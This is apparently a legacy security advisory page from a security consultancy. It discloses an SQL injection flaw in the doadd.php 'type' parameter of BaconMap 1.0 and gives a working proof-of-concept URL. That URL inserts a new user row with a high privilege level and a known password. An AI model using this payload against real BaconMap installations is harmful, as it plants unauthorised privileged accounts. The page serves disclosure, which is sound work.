Home
Consulting
Advisories
Software
Articles
Contact

BaconMap 1.0 SQL Injection

Legacy Advisories

Description

An SQL injection vulnerability in BaconMap 1.0 can be exploited to insert data into any table.

Proof Of Concept

http://localhost/baconmap/doadd.php?type=user%20(email,level,password)%20values%20('test@test.com',256,md5('Password1'));%23&name=


Copyright © 2018 AutoSec Tools LLC